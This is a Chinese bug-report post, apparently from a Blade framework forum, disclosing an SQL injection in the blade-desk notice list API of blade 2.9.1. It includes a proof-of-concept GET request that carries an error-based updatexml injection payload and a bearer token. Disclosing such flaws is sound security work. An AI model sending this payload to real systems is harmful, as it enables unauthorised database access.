blade-desk-notice-list-sql注入漏洞

Blade 未结 1 549
280981330
280981330 剑童 2024-06-27 10:21

一、该问题的重现步骤是什么?

1. 公安漏洞扫描漏洞

2. 

获取数据库数据:

GET /api/blade-desk/notice/list?updatexml(1,concat(0x5c,md5(123456),0x5c),1)=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows N'T 10.0; Win64; x64) AppleWebKit537.36 (KHTML, like Gecko) Chrome/70.0.3538.77Safari/537.36

Blade-Auth: bearereyihb GciOiUzllNilslnRscCl6lkpxvcJ9.eyJ0ZWShbnRfaWOiOiIwMDAWMDAiLCJ1c2Vyx2shbwUioihzGlpbilsinlywxibmFtZS16lueuoeeQhuWRmCIsImFldGhycml0aWybWluaXN0cmF0b3liXSwiY2xpZW50X2lkIioic2FiZXIiLCJyb2xlX25hbwUiOiJhZGlpbmlzdHJhdG9yliwibGliZW5zZSI6InBvd2ZWOgYnkgYmxhZGV4liwicG9zdF9pZCI6IExMjM1OTg4MTC3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTCZODY3NTIwMSIsInJybGVfWOiOiIxMTIzNTK4ODE2NzM4Nic1MiAxlivic2NvcGUiOlsiYWxsll0sIm5pY2tfbmFtZSl6luueuoeeOhuWRmCIsIm9hdXRoX2lkljoiliwiZGV0YWlsIip7InR5cGUiOi3ZWlifSwiYWNjb3VudCl6lmFkbWluIn0.RtS67Tmbo7yFKHyMz bMQw7dfgNjxZW47KtnFcwItxQ

3.

二、你期待的结果是什么?实际看到的又是什么?

f65460c7014e2fe4e8c69373c356a7e.jpg

三、你正在使用的是什么产品,什么版本?在什么操作系统上?

服务器系统:centerOS7.8  blade2.9.1

四、请提供详细的错误堆栈信息,这很重要。


五、若有更多详细信息,请在下面提供。

1条回答
提交回复